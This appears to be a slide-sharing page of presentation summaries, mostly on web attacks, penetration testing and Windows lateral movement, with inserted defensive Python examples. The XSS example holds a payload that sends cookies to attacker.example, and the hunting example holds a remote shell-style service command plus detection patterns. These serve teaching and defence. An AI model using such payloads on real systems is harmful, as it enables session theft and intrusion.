This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
The Certified Ethical Hacker (C|EH v12) program is one of the most respected certifications in the cybersecurity field.
https://www.infosectrain.com/courses/certified-ethical-hacker-ceh-training/
The document defines security attacks and threats. It describes types of attacks such as passive, active, insider, phishing, spoofing, hijacking, exploit and password attacks. It also discusses two common threats, Cross-Site Scripting (XSS) and SQL injection: XSS injects malicious script into pages served to other users, while SQL injection embeds SQL in input that a poorly designed application passes unmodified to the backend database.
This presentation describes penetration testing with a Who, What, Where, When, and How approach. In the presentation, you may discover the common pitfalls of a bad penetration test and you could identify a better one. You should be able to recognize and differentiate both looking at the methods (attitude) and result.
An XSS attack is a type of vulnerability that allows malicious scripts to be injected into web pages viewed by other users. There are three main types: reflected XSS, where the payload arrives in a request (typically a crafted link the victim clicks) and the server echoes it back into the response; stored XSS, where the payload is saved by the vulnerable site (for example in a comment or profile field) and served to every user who views it; and DOM-based XSS, where the site's own client-side JavaScript writes attacker-controlled data (such as part of the URL) into the page without the payload ever passing through the server. In all three cases the script runs with the privileges of the victim's browser session on that site. The document provides examples of how XSS attacks work and how they can be used to hijack accounts, insert hostile content, steal cookies, and redirect users.
These slides guide you through the tools and techniques one can use for footprinting websites or people. You will find useful tools and techniques; have a look.
CNIT 124 Ch 13: Post Exploitation (Part 1) - Sam Bowne
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1 edition (June 8, 2014)
This 1-day course introduces network penetration testing concepts and provides an overview of the penetration testing process. It covers prerequisites, objectives, benefits, definitions, types of penetration testing and phases including reconnaissance, scanning, exploitation, and reporting. The goal is to prepare students to understand and assist with penetration tests, though they will not be able to independently conduct professional tests after this introductory course.
Understand AWS best practices for Distributed Denial of Service (DDoS) resiliency and how AWS Shield can assist you to protect your business. Uncover how this tool safeguards web applications running on AWS, and how always-on detection and automatic inline mitigations minimize application downtime and latency.
This document summarizes a presentation about penetration testing with Metasploit. It introduces penetration testing and why organizations use it. It then discusses the basics of Metasploit, including interfaces like MSFconsole. Key concepts in Metasploit like exploits, payloads, and Meterpreter are explained. The presentation demonstrates Metasploit against different operating systems like Windows XP, Windows 7, and Ubuntu. It shows how to find and use appropriate exploits and payloads to gain remote access and post-exploitation activities.
The document discusses penetration testing and related security concepts. It covers topics like vulnerability assessment, security audits, the differences between penetration testing and other assessments, common penetration testing methodologies, and the standard phases of information gathering, network mapping, vulnerability identification, exploitation, privilege escalation, maintaining access and covering tracks.
A military concept now applied to cybersecurity, the cyber kill chain was developed by Lockheed Martin in 2011. It describes the phases an adversary follows to target an organization. There are seven well-defined phases, and an attack is considered successful if and when all of the phases have been completed.
(DOCUMENT IN ENGLISH)
Web application attacks can take many forms, including cross-site scripting (XSS), SQL injection, parameter tampering, command injection, session management issues, cookie poisoning, directory traversal, cross-site request forgery, and buffer overflows. XSS is a vulnerability that allows malicious JavaScript code to be injected and run in a user's browser, potentially accessing data. SQL injection involves inserting SQL commands into a database query to gain unauthorized access. Parameter tampering modifies URL parameters to change expected behavior.
This document provides an overview of scanning techniques used in ethical hacking. It defines scanning as gathering information about IP addresses, operating systems, services, and architectures of target systems. The document outlines common scanning types like port scanning, network scanning, and vulnerability scanning. It also describes popular scanning tools like Nmap and Hping2, and scanning methods like ping sweeps, SYN stealth scans, and Xmas scans. The goal of scanning is to detect live systems, open ports, operating systems, and services to inform later stages of hacking like banner grabbing, vulnerability assessment, and network mapping.
Cross Site Scripting (XSS) is a vulnerability that allows malicious users to insert client-side code into web pages that is then executed by a user's browser. This code can steal cookies, access private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS works by having the server display input containing malicious JavaScript from a request. There are different types of XSS attacks, including non-persistent, persistent, and DOM-based attacks. Prevention methods include validating, sanitizing, and escaping all user input on the server-side and client-side. Web vulnerability scanners like Burp Suite can help test for XSS and other vulnerabilities.
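The escaping advice in the two XSS summaries above is easy to get wrong because the correct encoding depends on where the data lands. The following added example (not code from either summarised document) shows a reflecting template beside context-aware output encoding for three contexts: HTML element/attribute text, a JavaScript string inside a `<script>` block, and a URL attribute. Function names and the `<p>Hello ...</p>` template are assumptions made for the example.

```python
import html
import json
from urllib.parse import urlsplit


def render_vulnerable(name):
    """Reflects the request parameter straight into the page body."""
    return "<p>Hello " + name + "</p>"


def encode_for_html(value):
    """Element and quoted-attribute context: & < > \" and ' become entities."""
    return html.escape(value, quote=True)


def render_safe(name):
    return "<p>Hello " + encode_for_html(name) + "</p>"


def encode_for_js_string(value):
    """JavaScript string context inside <script>: JSON-encode, then escape angle brackets
    so a '</script>' inside the data cannot terminate the script block early."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def safe_href(url):
    """URL (href/src) context: entity encoding does nothing against 'javascript:' URLs,
    so the scheme is allowlisted first, then the value is entity-encoded for the attribute."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("", "http", "https"):
        return "#"
    return encode_for_html(url)


if __name__ == "__main__":
    payload = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_vulnerable(payload))             # script tag survives intact
    print(render_safe(payload))                   # rendered as harmless text
    print("<script>var u = " + encode_for_js_string("</script><script>alert(1)") + ";</script>")
    print('<a href="' + safe_href("javascript:alert(1)") + '">link</a>')
```

Validation on the client side (mentioned in the summary) is a usability aid only; the server must encode on output, per context, because the same string is safe in one context and executable in another.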
Hunting Lateral Movement in Windows Infrastructure - Sergey Soldatov
The document discusses various techniques attackers can use to launch executables remotely on Windows systems by leveraging compromised credentials and built-in OS functionality. It describes how to detect remotely launched executables using Windows Event and Sysmon logs. Specific techniques covered include remote file copy over SMB, remote execution via WMI, WinRM, Powershell Remoting, scheduled tasks, services, the registry, and WMI subscriptions. The document provides the event sequences and most interesting events to look for when hunting for evidence of each technique.
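The detection side of the techniques listed above, as an added example that is not from the presentation: a small hunt over Windows Security, System and Sysmon events that flags the process-parentage and service-install patterns each remote-execution method leaves behind. The events are constructed samples in a simplified field layout (field names follow the real event schemas: Sysmon Event ID 1 `Image`/`ParentImage`/`User`, Security 4624 `LogonType`/`TargetUserName`, System 7045 `ServiceName`/`ImagePath`); the service name and paths are invented for the example.

```python
# Constructed sample events (not real telemetry). Index 1-3 are the suspicious ones.
SAMPLE_EVENTS = [
    {"source": "Security", "EventID": 4624, "LogonType": 3,
     "TargetUserName": "svc_admin", "IpAddress": "10.0.0.5"},
    {"source": "Sysmon", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "User": "CORP\\svc_admin"},
    {"source": "System", "EventID": 7045, "ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /c echo pwned > \\\\127.0.0.1\\ADMIN$\\out.txt"},
    {"source": "Sysmon", "EventID": 1,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe", "User": "CORP\\svc_admin"},
    {"source": "Sysmon", "EventID": 1, "Image": "C:\\Program Files\\Notepad++\\notepad++.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "User": "CORP\\alice"},
]

# Parent processes that only host remotely requested execution on a normal workstation.
REMOTE_PARENTS = {
    "wmiprvse.exe": "WMI remote execution (process spawned by WmiPrvSE.exe)",
    "wsmprovhost.exe": "WinRM / PowerShell Remoting (process spawned by wsmprovhost.exe)",
}
# Substrings in a new service's ImagePath that point at a one-shot shell rather than a real service.
SHELL_HINTS = ("cmd.exe", "%comspec%", "powershell", "admin$")


def basename(win_path):
    return win_path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def hunt(events):
    """Return [(event_index, description)] for events matching a lateral-movement pattern."""
    findings = []
    remote_users = set()          # accounts seen logging on over the network (type 3)
    for i, ev in enumerate(events):
        src, eid = ev["source"], ev["EventID"]
        if src == "Security" and eid == 4624 and ev.get("LogonType") == 3:
            remote_users.add(ev["TargetUserName"].lower())
        elif src == "Sysmon" and eid == 1:
            parent = basename(ev["ParentImage"])
            if parent in REMOTE_PARENTS:
                note = REMOTE_PARENTS[parent]
                user = ev["User"].split("\\")[-1].lower()
                if user in remote_users:
                    note += "; user had a prior network (type 3) logon"
                findings.append((i, note))
        elif src == "System" and eid == 7045:
            if any(h in ev["ImagePath"].lower() for h in SHELL_HINTS):
                findings.append((i, "remote service install with shell-style ImagePath (PsExec-like)"))
    return findings


if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(idx, why)
```

The value of the 4624/type-3 correlation is context rather than detection: WMI and WinRM parents are suspicious on their own, but knowing the same account just authenticated from another host is what turns a single alert into a lateral-movement hypothesis worth pivoting on (source IP, other hosts the account touched, the 7045 service name).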
This document discusses techniques for evading antivirus and firewalls, including generating executable files with embedded PowerShell commands to execute backdoors, generating macro-enabled Excel files with encoded payloads to act as Trojans, and using the Shellter tool to dynamically inject shellcode into Windows applications. Figures are provided showing the use of tools like Metasploit and Unicorn to generate payloads and backdoors, embedding them in files, bypassing antivirus detection, and attackers gaining sessions on victim machines.
Google dorks are search operators used to refine Google searches. They can be used to access secure webpages, download files, or access security cameras. Common dorks include "site:", "inurl:", "intitle:", and "filetype:" or "ext:". SQL injection is a code injection technique that exploits security vulnerabilities in database applications. It works by inserting SQL commands into user input fields to alter the meaning of SQL queries and gain unauthorized access to databases. Defenses include input validation, prepared statements, limiting privileges, and intrusion detection systems.
The document contains PHP code for a website that displays and searches product information from a database. It includes:
1. Code to connect to a MySQL database and select the "banhang" database.
2. Index code that includes header, sidebar, content, and footer files. Content displays products and handles search/detail page links.
3. Product display code that queries the database and loops through results to show images, prices and links.
4. Category, search, and detail inclusion files that query the database to populate dropdowns, search results, and detailed product pages.
The document discusses assistive technology (AT) as defined by IDEA 2004 and various examples of AT. It notes that IDEA 2004 requires IEP teams to consider AT needs for students with disabilities and that schools must provide AT and training. Several types of AT are then described, including personal amplifiers for hearing loss which reduce background noise, CCTVs for visual impairments to magnify print, talking calculators for learning disabilities in math, and page turners for physical disabilities.
This document contains a list of over 150 potential SQL injection dorks targeting parameters with "id=" in the URL. The dorks target content management systems and databases on websites. It also contains generic dorks searching for SQL warning messages.
The document discusses content sniffing vulnerabilities in web browsers. It explains that browsers try to determine the true content type of a file from its bytes, even if the server provides the wrong Content-Type header. This allows an attacker to craft a file, such as an image, that is also valid HTML containing JavaScript. When the browser sniffs the file and treats it as HTML, the JavaScript executes in the origin of the vulnerable website. The document provides examples of how this can be used to steal cookies from users and perform cross-site scripting attacks. It recommends server- and browser-side fixes: sending the correct Content-Type header and adding the X-Content-Type-Options: nosniff header so the browser does not second-guess the declared type.
Artificial intelligence (AI) is the interdisciplinary study of how to build intelligent systems, modelled on human intelligence. AI is defined as a machine's capacity to reason and spans fields such as computer science, mathematics and philosophy. Although machines cannot think the way humans do, AI has allowed them to simulate complex processes, albeit with limitations and with the risk of negative consequences if they get out of control.
The document outlines details about the Certified Ethical Hacker (CEH) certification course. The 5-day, 8 hours per day course covers topics like footprinting, reconnaissance, scanning networks, system hacking, social engineering, and cryptography. Successful students will receive the CEH certification from EC-Council after passing the online exam on the last day of training. Contact information is provided for inquiries.
ELECTRONIC VOTING MACHINE (EVM) HACKABLE OR NOT - SHUBHAM SAHU
This document discusses electronic voting machines (EVMs) in India and whether they can be hacked. It begins by describing what an EVM is and how it works. It then addresses whether EVMs can be hacked, explaining that while direct hacking is not possible, tampering with hardware is. The document outlines two attacks involving replacing EVM parts or using devices to change stored vote records. It notes that current safeguards are inadequate and that the lack of transparency in the EVM system means problems cannot be easily fixed. Frequently asked questions and sources are provided at the end.
This document provides instructions for making various configuration changes and restrictions in the Windows registry related to system, networking, and application settings. It includes over 50 entries organized by topic that describe how to modify registry keys and values to disable features, restrict access, and modify default behaviors. Examples include disabling the right click context menu, hiding drives, locking file associations, and restricting changes to the start menu and control panel options.
Google dorks, also known as Google hacking, involves using specific search operators and techniques on Google to find sensitive information on websites. Some key points made in the document include:
- Google dorking uses operators like "site:", "filetype:", "intitle:", and "inurl:" to refine search results and maximize search value. This can be used to uncover private information, configurations, backups, and vulnerabilities.
- Information found through Google hacking may remain exposed in Google's cache for months after being removed from websites.
- Google indexes everything publicly available on the internet, making it a powerful tool for passive information gathering, which is an important first step for hackers.
- The document encourages
This document contains notes on networking concepts including network requirements, communication media, networking devices, Ethernet cabling, OSI model, TCP/IP protocols, IP addressing, and classes of networks. It defines networking as the method of establishing a connection between two or more computers for data communication and sharing resources. Basic requirements for establishing a network include networking cards and communication media such as wired (coaxial cable, fiber optics, twisted pair) and wireless. Common networking devices are hubs, switches, routers, and bridges.
This document provides an overview of Metasploit for beginners. It discusses why Metasploit is useful, how to set up a demo environment, and how to use auxiliary and exploit modules. It then demonstrates auxiliary modules for scanning and information gathering. It also demonstrates two exploit modules against ElasticSearch and Jenkins, using reverse shell payloads. The document provides a cheat sheet for navigating msfconsole and describes common commands used prior to demonstrations.
The document contains a list of search strings that can be used to find potential vulnerabilities on websites and web applications. Some of the search strings look for pages indicating login portals for administrative access, content management systems, and other common internet-facing applications. Other search strings try to identify specific applications or technologies like vBulletin, ColdFusion, and iSecure. The overall document appears to be sharing ways to search for unprotected administrative or backend interfaces online.
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra (OWASP Delhi)
This document discusses techniques for countering online surveillance and protecting private communications. It begins by outlining common surveillance methods used by governments and companies, such as wiretapping and exploiting software vulnerabilities. It then discusses using cryptography to counter surveillance and keep data safe, such as encrypting files and filling volumes with cryptographically secure random data. Secure authentication techniques are presented that allow verifying credentials without revealing passwords. Finally, the document details a method for encrypting and authenticating private messages between two parties using Diffie-Hellman key exchange and digital signatures to provide encryption, authentication, deniability and perfect forward secrecy.
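The private-messaging construction summarised above, as an added example that is not the talk's own code: an ephemeral Diffie-Hellman exchange per session (forward secrecy), keys derived from the shared secret, and messages encrypted and authenticated with a MAC both parties hold (which is what gives deniability: either side could have produced any message). Two substitutions are made and labelled: the talk binds the DH values to identities with digital signatures, while here a pre-shared long-term key and HMAC stand in for the signature; and a SHA-256 counter keystream stands in for a real cipher. The group parameters are a toy size chosen for readability and are not secure.

```python
import hashlib
import hmac
import os

# Toy group so the arithmetic is readable. ASSUMPTION: this prime is far too small to be
# secure; a real deployment uses a vetted 2048-bit+ MODP group or X25519.
P = (1 << 127) - 1
G = 3


def dh_keypair():
    priv = int.from_bytes(os.urandom(16), "big") % (P - 2) + 2
    return priv, pow(G, priv, P)


def derive_keys(shared):
    """Separate encryption and MAC keys from the DH shared secret."""
    raw = shared.to_bytes(16, "big")
    return hashlib.sha256(b"enc" + raw).digest(), hashlib.sha256(b"mac" + raw).digest()


def keystream(key, nonce, n):
    """Toy SHA-256 counter-mode keystream (stand-in for a real AEAD such as AES-GCM)."""
    out = b""
    for counter in range((n + 31) // 32):
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
    return out[:n]


def seal(enc_key, mac_key, plaintext):
    nonce = os.urandom(12)
    ct = bytes(a ^ b for a, b in zip(plaintext, keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()   # encrypt-then-MAC
    return nonce + ct + tag


def open_sealed(enc_key, mac_key, blob):
    nonce, ct, tag = blob[:12], blob[12:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("MAC check failed: tampered message or wrong session")
    return bytes(a ^ b for a, b in zip(ct, keystream(enc_key, nonce, len(ct))))


def authenticate_pub(longterm_key, pub):
    """Binds the ephemeral public value to an identity. The talk's design signs it; here a
    pre-shared long-term key and HMAC stand in (substitution made for this example)."""
    return hmac.new(longterm_key, pub.to_bytes(16, "big"), hashlib.sha256).digest()


def run_session(longterm_key, alice_msg, bob_msg):
    """One session: ephemeral DH both ways, authenticated DH values, one message each way."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    # Each side sends (pub, tag); the receiver checks the tag before using the value.
    for pub, tag in ((a_pub, authenticate_pub(longterm_key, a_pub)),
                     (b_pub, authenticate_pub(longterm_key, b_pub))):
        if not hmac.compare_digest(tag, authenticate_pub(longterm_key, pub)):
            raise ValueError("peer identity check failed")
    a_enc, a_mac = derive_keys(pow(b_pub, a_priv, P))
    b_enc, b_mac = derive_keys(pow(a_pub, b_priv, P))
    del a_priv, b_priv   # forward secrecy: no long-lived secret can recover this session
    wire_from_alice = seal(a_enc, a_mac, alice_msg)
    wire_from_bob = seal(b_enc, b_mac, bob_msg)
    return open_sealed(b_enc, b_mac, wire_from_alice), open_sealed(a_enc, a_mac, wire_from_bob)


if __name__ == "__main__":
    got = run_session(b"constructed pre-shared long-term key", b"hello bob", b"hi alice")
    print(got)
```

Forward secrecy comes entirely from discarding the ephemeral private exponents after key derivation; compromise of the long-term key later lets an attacker impersonate, but not decrypt recorded sessions. Deniability follows from the MAC: a transcript proves nothing to a third party because the recipient could have forged it.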
This document discusses common web application vulnerabilities and methods for preventing hacking. It covers code injection attacks using C99 shell, file inclusion vulnerabilities through remote and local file access, dictionary attacks, SQL injections, cross-site scripting (XSS), clickjacking, dynamic code evaluation, and countermeasures like input validation, output encoding, prepared statements, and avoiding dangerous functions. The goal is to explain how applications are hacked and defensive coding practices to prevent attacks.
This document discusses various vulnerabilities in PHP coding practices and provides examples of how each vulnerability can be exploited as well as how to fix them. It covers remote file inclusion, local file inclusion, local file disclosure, SQL injection, remote command execution, remote code execution, cross-site scripting, authentication bypass, and cross-site request forgery vulnerabilities. For each vulnerability, it provides a basic PHP code example to demonstrate the issue, how an attacker could exploit it, and recommendations on how to fix the vulnerable code, such as sanitizing user inputs, using prepared statements, and implementing authentication systems. The goal is to help PHP developers write more secure code and avoid common vulnerabilities.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
This document summarizes techniques for exploiting local file inclusion (LFI) vulnerabilities to achieve remote command execution (RCE). It begins by explaining LFI and how it can be used to read local files. It then describes how LFI can be used to inject code into log files or environment variables to execute commands remotely. The document provides an introduction to using Perl sockets and libraries for creating HTTP requests, and gives an example Perl exploit script that uses log file injection to execute code via LFI. It concludes with recommendations for preventing LFI vulnerabilities.
This document discusses secure file upload in PHP web applications. It begins by describing a naive file upload implementation that allows arbitrary files to be uploaded, including PHP scripts that could execute commands on the server. It then discusses various approaches to make file uploads more secure, such as verifying the content type, image file contents, and file extensions. However, it notes that an attacker can bypass these checks by manipulating the HTTP request. The document concludes by providing a reference implementation for a more secure file upload process.
Table Of Content
The OWASP Top Ten
Invalidated Redirect and Forwards
Security Misconfiguration
Application Fingerprint
Error handling And Logging
Noise
PHP Guidelines
Web application security is an important topic gaining more attention. Sensitive data needs protection not only on servers but also when traveling over networks. Common web application vulnerabilities include cross-site scripting, SQL injection, and cross-site request forgery. Developers should implement measures like encryption, limiting file access and uploads, hiding errors, and using secure sessions to authenticate users. Security requires ongoing consideration to prevent network attacks, unauthorized access, and data theft.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
Local File Inclusion (LFI) vulnerabilities allow an attacker to include files from a web server by manipulating input that is used to include files. For example, a script that includes files based on a page parameter, like script.php?page=index.html, could be exploited by changing the page parameter to try and include files like ../../../../etc/passwd. Successful exploitation can reveal sensitive information like the server's password file. LFI vulnerabilities are common and can often be exploited through PHP wrappers like php://input or php://filter to include files or execute system commands on the server.
Short presentation on techniques for protecting against vulnerabilities in commonly available PHP packages using a combination of Apache + FastCGI + suEXEC + chroot + mod_security2
The document discusses various LAMP security practices such as preventing XSS attacks by sanitizing user input, using prepared statements to prevent SQL injection, disabling unnecessary modules and server information, limiting file uploads and access to the file system, and write protecting configuration files. It provides examples of code and configuration settings to implement these practices.
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
Just as a good chess player thinks five moves ahead, a great penetration tester should be able to visualize their attack in order to compromise high-value targets. This presentation will explore how a penetration tester can learn to leverage attack chaining for maximum impact. A penetration test is supposed to be a simulation of a real-world attack. Real-world attackers do not use expensive automated tools or a checklist. Nor do they use a single technique or exploit to compromise a target. More commonly they combine several techniques, vulnerabilities, and exploits to create a “chained” attack that achieves a malicious goal. Chained attacks are far more complex and far more difficult to defend against. We want to explore how application vulnerabilities relate to one another and build a mind map that guides penetration testers through various attack scenarios. Prepare to be blown away on this roller coaster ride with real-world examples of massive compromises. If you are not a thrill seeker, this presentation may leave you a bit queasy.
Owasp Wasc App Sec2007 San Jose Finding Vulnsin Flash Appsguestb0af15
The document discusses finding vulnerabilities in Flash applications through runtime analysis. It describes how uninitialized variables, external files, and dangerous native functions can be entry points for attacks. It then provides a recipe for analyzing a SWF at runtime to detect vulnerabilities, including using an analyzer framework that loads the SWF and implements resolution methods to detect undefined variables and inject attack patterns.
The document provides instructions for installing and setting up the Symfony PHP framework. It discusses different installation methods like using the sandbox, PEAR, or SVN. It also covers generating a new Symfony project and application, configuring the web server, and troubleshooting common issues. Version control of Symfony projects using Subversion is also described.
The document provides an overview of the Lumen micro-framework by Laravel. It discusses Lumen's system requirements, how to install Lumen using Composer or the Lumen installer, configuring pretty URLs, the directory structure, HTTP routing, middleware, controllers, and views. Additional features covered include caching, databases, encryption, errors and logging, events, queues, testing, and more full-stack features like authentication and mail.
This document provides an overview of the Phalcon PHP framework. It discusses why frameworks are important for PHP development and how traditional frameworks work. It then explains how Phalcon is different as it is implemented as a PHP extension written in C, making it faster than traditional frameworks. The document demonstrates how to install Phalcon, create a basic project structure, define controllers and models, and connect to a database.
PHP SA 2014 - Releasing Your Open Source Projectxsist10
The document provides guidance on releasing open source projects. It discusses security, hosting, managing source code, package management, design patterns, testing, and resources. The key recommendations are to focus on security, use GitHub for hosting, manage versions with SemVer, use Composer for dependencies, implement common design patterns, write unit tests with at least 80% coverage, and wrap resources to allow for mocking in tests.
This document summarizes a Drupal hack that occurred at the University of Toronto Libraries. The hack was detected by analyzing Apache logs and noticing odd traffic patterns, including many wp-conf requests. The hack exploited an FCKEditor bug and the PHP Filter module to inject malicious code that could execute PHP. This allowed the hacker to access files, databases, and user information. To recover, the organization restored from backups, disabled vulnerable modules, reset passwords, and improved security practices like access controls and updates. Lessons included following security guidelines, testing updates, using HTTPS, and establishing security processes and failure rehearsals.
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
During the session we will go through different methods of exploiting file upload pages in order to trigger Remote Code Execution, SQL Injection, Directory Traversal, DOS, Cross Site Scripting and else of web application vulnerabilities with demo codes. Also, we will see things from both Developers and Attackers side. What are the protections done by Developers to mitigate file upload issues by validating File Name, File Content-Type, actual File Content and how to bypass it All using 15 Technique!
Tame Your Build And Deployment Process With Hudson, PHPUnit, and SSHDavid Stockton
The document discusses setting up continuous integration using Hudson. It explains that Hudson automates build and deployment processes, provides instant feedback, and helps keep teams honest about tests. Setup involves installing Java, Hudson, and configuring a sample project in Hudson to build from a Git repository on each commit.
The document discusses search operators for Yandex, a Russian search engine. It provides examples of over 20 different Yandex boolean operators like +, -, &&, ||, and others. It explains what each operator does and provides examples of queries using the various operators to refine searches on Yandex. The boolean operators allow users to search for exact phrases, exclude terms, define word proximity, search specific fields, and more.
This document discusses social media intelligence and Twitter advanced search capabilities. It introduces Twitter, explaining that it is a microblogging platform and the 8th most popular website globally. The document also outlines different advanced search operators for Twitter including searching by words, phrases, hashtags, accounts, locations, dates, and tweet properties like whether they are positive, negative, questions, or retweets. It notes that advanced search allows more precise searching than basic search to collect social mentions for social media intelligence purposes.
OSINT Tool - Reconnaissance with Recon-ngRaghav Bisht
Recon-ng is a Python-based web reconnaissance framework that allows automated reconnaissance. It focuses on open-source intelligence gathering from web-based sources. The tool downloads from Bitbucket and has usage guides there. Recon-ng demonstrations show searching reverse domains, using the Builtwith and Punkspider modules to gather technical information, and using the LinkedIn module to find people at a specific company.
OSINT Tool - Reconnaissance with MaltegoRaghav Bisht
This document provides an overview of the open source intelligence (OSINT) tool Maltego. It describes what Maltego is, how it works, and how to install it. Maltego allows users to map relationships between entities like people, organizations, websites, domains, and IP addresses through the use of transforms. It gathers information from online sources and users can write their own transforms and machines. The document provides details on features of Maltego and how to download the commercial or community editions.
This document discusses search and advanced search features on LinkedIn. It introduces LinkedIn as a professional networking site and explains why it is useful for social media intelligence. It then describes LinkedIn's advanced search page and the various filters that can be used to refine searches, such as keywords, name, title, location, relationship filters, current/past companies, school, languages, interests, and premium member filters. Finally, it explains how Boolean operators like AND, OR, NOT, parentheses, and quotation marks can be used to perform more complex searches on LinkedIn.
The document discusses social media intelligence (SOCMINT) and how to use Facebook's graph search and search functions to find information about people. It provides examples of different types of queries that can be used to search for people by name, age, location, school, likes, photos, posts, and more. The case study demonstrates how to use these search functions to find information about a black hat hacker named Shadow Walker.
The document discusses the different layers of the internet, including the clearweb which is accessible via search engines, the dark web which search engines don't index, and the deep web which requires special software like Tor or I2P to access. It provides an overview of Tor and I2P anonymity networks, and how to configure them to access the deep web through URLs ending in .onion rather than standard top-level domains. The document also gives an example of a hidden wiki URL that can only be accessed through the Tor browser, not a regular browser.
Ethical Hacking (CEH) - Industrial Training ReportRaghav Bisht
This document is Raghav Bisht's report on his 6-week summer training at Bytec0de Securities PVT. LTD from May 25th to July 25th 2013 under the guidance of Mr. Mohit Yadav. The report provides an overview of the training organization, outlines the training objectives and course topics covered, and thanks those who supported his training experience. Key topics covered in the training included introduction to hacking and security, ethical hacking, technology aspects of IT security, hacking steps and techniques like DDoS attacks, wireless hacking, SQL injection, and penetration testing.
SQL injection is a code injection technique where malicious SQL statements are inserted into an entry field for execution, allowing a hacker to interfere with a database-driven application's interaction with backend databases. There are different types of SQL injections, including union-based, error-based, and blind SQL injections. Authentication can also be bypassed through SQL injection by making logical conditions like 1=1 or ""="" always true. The document provides examples of SQL injection payloads and demo websites to practice SQL injection techniques.
OS command injection vulnerabilities occur when user input is not sanitized before being passed to a shell command interpreter. This allows attackers to inject arbitrary commands that will be executed by the server, potentially compromising the server or application data. Command injection vulnerabilities are serious because they may enable attackers to use the server as a platform for launching attacks against other systems. Commix is an open source tool that can detect and exploit command injection vulnerabilities.
Introduction To Vulnerability Assessment & Penetration TestingRaghav Bisht
A vulnerability assessment identifies vulnerabilities in systems and networks to understand threats and risks. Penetration testing simulates cyber attacks to detect exploitable vulnerabilities. There are three types of penetration testing: black box with no system info; white box with full system info; and grey box with some system info. Common vulnerabilities include SQL injection, XSS, weak authentication, insecure storage, and unvalidated redirects. Tools like Nexpose, QualysGuard, and OpenVAS can automate vulnerability assessments.
Introduction To Exploitation & MetasploitRaghav Bisht
Penetration testing involves evaluating systems or networks using malicious techniques to identify security vulnerabilities. It is done by exploiting vulnerabilities to gain unauthorized access to sensitive information. Common vulnerabilities arise from design errors, poor configuration, and human error. Penetration testing is conducted to secure government data transfers, protect brands, and find vulnerabilities in applications, operating systems, databases, and network equipment. Metasploit is an open-source framework used for hacking applications and operating systems that contains exploits, payloads, and modules. Msfconsole is an interface used to launch attacks and create listeners in Metasploit.
Hacking involves exploiting vulnerabilities in computer systems or networks to gain unauthorized access. There are different types of hackers, including white hat hackers who perform ethical hacking to test security, black hat hackers who perform hacking with malicious intent, and grey hat hackers who may sometimes hack ethically and sometimes not. Ethical hacking involves testing one's own systems for vulnerabilities without causing harm. Vulnerability assessments and penetration tests are common ethical hacking techniques that involve scanning for vulnerabilities and attempting to exploit them in a controlled way. Popular tools used for ethical hacking include Kali Linux, Nmap, Metasploit, and John the Ripper.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
This document provides an introduction to hacking and security, defining key terms. It explains that hacking involves exploiting vulnerabilities to achieve unauthorized access. Hackers are classified as white hats (ethical), black hats (crackers), or grey hats. The document outlines the importance of understanding systems to secure them through ethical hacking and penetration testing. It lists certifications in security and provides keywords and terms for hackers to be familiar with.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc
